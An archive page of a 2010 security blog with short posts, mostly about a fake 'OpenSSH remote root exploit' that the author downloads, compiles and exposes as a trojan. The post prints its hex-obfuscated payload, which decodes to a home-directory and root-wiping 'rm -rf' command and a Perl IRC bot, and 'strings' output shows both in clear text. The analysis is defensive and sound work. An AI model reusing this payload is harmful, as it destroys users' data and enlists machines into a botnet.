Pen Testing the Web With Firefox
Posted: February 19th, 2010 | Author: xanda | Filed under: IT Related | Tags: addons, exploit, firefox, hacking, metasploit, web, web based | 4 Comments »Nice write up by Michael โtheprez98โ Schearer
BruCON 2010: Call for Papers
Posted: February 17th, 2010 | Author: xanda | Filed under: IT Related | Tags: 2010, brucon, cfp, conference, hack, paper | 1 Comment »Call for Papers BruCON.v2 2010: Hacking for B33r
================================
Brussels, Belgium — This is a call for papers and participation for the second BruCON edition, a 2-day Security and Hacking Conference, full of interesting presentations, workshops and security challenges.
BruCON is an open-minded gathering of people discussing computer security, privacy, and information technology. The conference tries to create bridges between the various actors active in computer security world, included but not limited to hackers, security professionals, security communities, non-profit organizations, CERTs, students, law enforcement agencies,…..
The conference will be held in Brussels (24 & 25 September 2010) at The Surfhouse(www.surfhouse.be).
Java Decompiler – Yet Another Fast Java Decompiler
Posted: February 9th, 2010 | Author: xanda | Filed under: IT Related | Tags: class, crack, decompile, jar, java, RE, reverse engineering, reversing | 3 Comments »I’ve heard about decompiling java class since 2007 (when I was in MIMOS) but never try it before. Maybe because I don’t really code in Java.. and I don’t really like Java ๐
But today, I’ve found something interesting to play with.. J2ME based one time password application.. Since I’m on Mac, so I’ve found that Java Decompiler (JD) is the most suitable tool to use for me..
Its also available for Windows and Linux..
See some screenshots HERE
Yet Another Fake Exploit
Posted: February 7th, 2010 | Author: xanda | Filed under: IT Related | Tags: 0day, fake, openssh, script kiddies, ssh | 9 Comments »PenTestIT is listed in my RSS list and just now, i’ve got a feed from PenTestIT with the title “openssh-53p1-remote-root.c”
Hurm.. what a surprise news, but.. I think I’m too old for this.. lets see..
xanda:tmp adnan$ cd /tmp xanda:tmp adnan$ mkdir lame xanda:tmp adnan$ cd lame/ xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c --2010-02-07 20:41:28-- http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c Resolving pentestit.com (pentestit.com)... 208.87.241.96 Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13273 (13K) [text/x-c] Saving to: `openssh-53p1-remote-root.c' 100%[=========================================================================================================================================>] 13,273 7.82K/s in 1.7s 2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273] xanda:lame adnan$ more openssh-53p1-remote-root.c /* openssh-53p1-remote-root.c * OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one * Email: root@chamillionaire.com * Release date: Unreleased (private) / 2010 * Available Patch: No fix-patch has been issued or reported. * * ----------------- * Additional Notes: * ----------------- * By using this software, you take any and/or all responsibility * for the damage(s) caused and will not bitch to me, the|one, about it. * * USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #define VALID_RANGE 0xb44ffe00 #define build_frem(x,y,a,b,c) a##c##a##x##y##b char jmpcode[] = "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f" "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"; char shellcode[] = "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f" "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24" "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24" "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79" "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22" "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f" "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24" "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24" "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63" "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake xanda:lame adnan$ strings fake | more the|one is rooting your Linux/FreeBSD Network Usage: %s -h <host> -p port Options: -h ip/host of target -p port -d username -B memory_limit 8/16/64 Root is required for raw sockets, etc. [+] the|one's OpenSSH Remote Root Exploit - 2010 [-] Resolving Failed [-] Connecting Failed Getting root isn't that hard, skiddie PS1='sh-3.2#' /bin/sh [-] Failed to exploit the target : rm -rf ~ /* 2> /dev/null & #!/usr/bin/perl $chan="#cn"; $ke"; while (<$sockG (.*)$/){print "; while (<$sockn"; sleep 1; k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl #!/usr/bin/perl #!/usr/bin/perl $chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print "; while (<$sockn"; sleep 1; k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl #!/usr/bin/perl |
knock knock knock… script kiddies.. grow up!
0day on TM Billion ADSL Modem/Router
Posted: February 6th, 2010 | Author: xanda | Filed under: IT Related | Tags: 0day, billion, exploit, malaysia, modem, remote, riger, router, telekom, TM | 7 Comments »Quick update
Here is my short update. I was playing around with the ‘nice’ modem and I found 2 vulnerability
1) Remote code execution
2) DoS
Tested on Firmware Version : 2.10.5.0(UE0.C2C)3.7.6.1
I’m looking forward to play around with Riger Corporation’s modem that came with “Enhanced by TM R&D Malaysia” label on it ๐